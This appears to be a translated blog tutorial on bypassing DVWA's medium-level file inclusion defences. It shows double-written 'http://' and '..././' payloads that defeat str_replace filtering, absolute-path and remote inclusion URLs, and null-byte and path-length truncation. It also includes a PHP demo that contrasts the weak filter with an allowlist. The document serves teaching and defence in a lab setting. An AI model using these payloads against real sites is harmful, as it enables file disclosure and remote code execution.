File inclusion vulnerabilities: str_replace function bypass and include truncation bypass

str_replace function bypass

Experimental environment: DVWA, security level medium
Programmers sometimes rely on the str_replace function for defense. This function is extremely unsafe as a filter, because its replacement rules can be bypassed simply by writing the forbidden substring twice (double-write bypass).

Bypass method

For example, when page=hthttp://tp://192.168.0.103/phpinfo.txt, the str_replace function removes the single occurrence of http://, leaving page=http://192.168.0.103/phpinfo.txt, and the remote file is included and its code executed.

At the same time, because only "../" and "..\" are replaced, there is no restriction at all on including files by absolute path.

Three examples

1. Local file inclusion
http://192.168.0.103/dvwa/vulnerabilities/fi/page=..././..././..././..././..././..././..././..././..././..././..././Xampp/htdocs/dvwa/php.ini
2. An absolute path is not affected in any way
http://192.168.0.103/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini
3. Remote file inclusion
http://192.168.0.103/dvwa/vulnerabilities/fi/page=htthttp://p5.12.1phpphp.txt
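As an added illustration (not DVWA's own code), the following PHP contrasts a single-pass str_replace filter of the kind described above with an allowlist check that never tries to "clean" the input; the page names, temporary directory and sample inputs are constructed for the demo.

```php
<?php
// Filter in the style the post describes: strips "http://", "https://", "../", "..\".
// str_replace makes ONE pass per search string, so a double-written input survives.
function weakFilter(string $page): string {
    return str_replace(['http://', 'https://', '../', '..\\'], '', $page);
}

// Allowlist: only exact, known page names are accepted, then the resolved path is
// checked to still lie under $baseDir. Nothing is rewritten, so there is no
// replacement rule to bypass.
function resolvePage(string $page, array $allowed, string $baseDir): ?string {
    if (!in_array($page, $allowed, true)) {
        return null;                      // unknown page: refuse instead of sanitising
    }
    $real = realpath($baseDir . '/' . $page . '.php');
    $root = realpath($baseDir);
    // realpath() resolves ".." and symlinks; confirm the result stayed inside $baseDir.
    if ($real === false || $root === false
        || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Constructed environment: a temp dir holding one legitimate page.
$baseDir = sys_get_temp_dir() . '/fi_demo_' . getmypid();
mkdir($baseDir);
file_put_contents($baseDir . '/home.php', "<?php echo 'home';\n");

$samples = [
    'hthttp://tp://192.168.0.103/phpinfo.txt',   // double-written scheme (from the post)
    '..././..././etc/passwd',                    // double-written traversal
    'C:/xampp/htdocs/dvwa/php.ini',              // absolute path, untouched by the filter
    'home',                                      // legitimate page
];
foreach ($samples as $s) {
    printf("%-42s filter -> %-28s allowlist -> %s\n", $s, weakFilter($s),
        resolvePage($s, ['home', 'about'], $baseDir) ? 'accepted' : 'rejected');
}

unlink($baseDir . '/home.php');
rmdir($baseDir);
```

The first three inputs come out of weakFilter() as a usable URL, a traversal string and an unchanged absolute path respectively, while resolvePage() rejects all three and accepts only "home".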

Include truncation bypass

Defense code

	<?php
	// If the page parameter is set, include it with ".php" appended; otherwise fall back to home.php.
	if (isset($_GET['page'])) {
		include $_GET['page'] . ".php";
	} else {
		include 'home.php';
	}
	?>

The code checks whether the parameter is set. If it is, it includes the file named by the parameter with ".php" appended as a defense; if it is not set, it includes home.php.
This bypass only works when magic_quotes_gpc = off and the PHP version is below 5.3.4. The suffix can then be bypassed by %00 (null byte) truncation, although this is rarely seen today. Path-length truncation is another form, for example:

index.php?file=info.txt//////////////......(more than a certain number of "/" characters)

Personal thoughts

Sometimes bypassing a defensive measure is not just about avoiding interception, but about making use of the defense itself: turning the other side's measures into one's own, so that some defenses can be bypassed.


Origin blog.csdn.net/weixin_43079958/article/details/105398623